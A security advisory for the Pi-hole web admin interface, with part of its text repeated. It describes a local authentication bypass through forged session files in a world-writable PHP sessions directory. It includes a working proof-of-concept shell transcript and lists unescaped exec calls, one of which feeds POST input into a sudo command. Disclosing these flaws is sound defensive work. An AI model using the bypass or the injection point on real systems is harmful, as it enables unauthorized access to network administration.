Web authentication bypass with local system access via world writable permissions.
High - Allows attackers to bypass web authentication.
It’s possible for a local user (non-root & non-pihole) to write to /var/lib/php/sessions to bypass the web interface’s login page.
root@2f496b742755:/# apt update && apt install curl -y
root@2f496b742755:/# useradd -m -s /bin/bash test
root@2f496b742755:/# su - test
test@2f496b742755:~$ curl 'localhost/admin/api.php?status&versions='
{"core_update":false,"web_update":false,"FTL_update":false,"docker_update":false,"core_current":"v5.17.1","web_current":"v5.20.1","FTL_current":"v5.23","docker_current":"2023.05.2","core_latest":"v5.17.1","web_latest":"v5.20.1","FTL_latest":"v5.23","docker_latest":"2023.05.2","core_branch":"master","web_branch":"master","FTL_branch":"master"}
test@2f496b742755:~$ curl -b "persistentlogin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 'localhost/admin/api_db.php?status&network='
test@2f496b742755:~$ UMASK=0777 echo 1689793078 > /var/lib/php/sessions/ph_plt_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.txt
test@2f496b742755:~$ curl -b "persistentlogin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 'localhost/admin/api_db.php?status&network='
{"network":[{"id":1,"hwaddr":"02:42:28:c7:59:64","interface":"eth2","firstSeen":1689191102,"lastQuery":0,"numQueries":0,"macVendor":"","aliasclient_id":null,"ip":["172.18.0.1"],"name":[""]},{"id":2,"hwaddr":"00:00:00:00:00:00","interface":"lo","firstSeen":1689191102,"lastQuery":1689191140,"numQueries":4,"macVendor":"virtual interface","aliasclient_id":null,"ip":["127.0.0.1"],"name":["localhost"]},{"id":3,"hwaddr":"02:42:0a:00:05:03","interface":"eth1@if127","firstSeen":1689191102,"lastQuery":0,"numQueries":0,"macVendor":"","aliasclient_id":null,"ip":["10.0.5.3"],"name":[""]},{"id":4,"hwaddr":"02:42:ac:12:00:03","interface":"eth2@if129","firstSeen":1689191102,"lastQuery":0,"numQueries":0,"macVendor":"","aliasclient_id":null,"ip":["172.18.0.3"],"name":[""]},{"id":5,"hwaddr":"02:42:0a:00:00:0f","interface":"eth0@if131","firstSeen":1689191102,"lastQuery":0,"numQueries":0,"macVendor":"","aliasclient_id":null,"ip":["10.0.0.15"],"name":[""]},{"id":6,"hwaddr":"02:42:0a:00:00:06","interface":"eth0","firstSeen":1689191160,"lastQuery":1689191146,"numQueries":3,"macVendor":"","aliasclient_id":null,"ip":["10.0.0.6"],"name":[""]},{"id":7,"hwaddr":"ip-::","interface":"N\/A","firstSeen":1689191160,"lastQuery":1689191140,"numQueries":14,"macVendor":"","aliasclient_id":null,"ip":["::"],"name":["pi.hole"]}],"message_count":0}
From the Chrome console a user can simply set a peristentlogin cookie to "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" and refresh the page.
Note it's the Debian php package itself that sets /var/lib/php/sessions permissions as world writable.
root@f612b9a22be3:/# apt update && apt install php -y
root@f612b9a22be3:/# ls -ld /var/lib/php/sessions/
drwx-wx-wt 2 root root 4096 Jul 13 2022 /var/lib/php/sessions/
Most system calls use pihole_execute() which wrap commands with escapeshellcmd(). There are a few system calls however that do not wrap escapeshellcmd().
# grep exec\( -R AdminLTE/*.php | grep -v pihole_execute | grep -v stmt
AdminLTE/settings.php: $timezone = shell_exec("date +'%Z'");
AdminLTE/settings.php: $FTLversion = exec('/usr/bin/pihole-FTL version');
# grep exec\( -R AdminLTE/scripts/pi-hole/php/*.php | grep -v '$db'
AdminLTE/scripts/pi-hole/php/func.php: exec($command, $output, $return_status);
AdminLTE/scripts/pi-hole/php/func.php: return shell_exec('pidof pihole-FTL');
AdminLTE/scripts/pi-hole/php/func.php: return trim(exec('ps -p '.$FTLpid.' -o '.$arg));
AdminLTE/scripts/pi-hole/php/header_authenticated.php:$nproc = shell_exec('nproc');
AdminLTE/scripts/pi-hole/php/savesettings.php: exec('sudo pihole -a theme '.$_POST['webtheme']);
AdminLTE/scripts/pi-hole/php/teleporter.php: exit('cannot open/create '.htmlentities($archive_file_name)."<br>\nPHP user: ".exec('whoami')."\n");
Summary
Web authentication bypass with local system access via world writable permissions.
Severity
High - Allows attackers to bypass web authentication.
Proof of Concept
Local System Users can bypass Web Interface Authentication
It’s possible for a local user (non-root & non-pihole) to write to /var/lib/php/sessions to bypass the web interface’s login page.
From the Chrome console a user can simply set a peristentlogin cookie to "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" and refresh the page.
Note it's the Debian php package itself that sets /var/lib/php/sessions permissions as world writable.
Further Analysis
Most system calls use pihole_execute() which wrap commands with escapeshellcmd(). There are a few system calls however that do not wrap escapeshellcmd().
Timeline
Date reported: 07/14/2023
Date fixed:
Date disclosed: 09/06/2024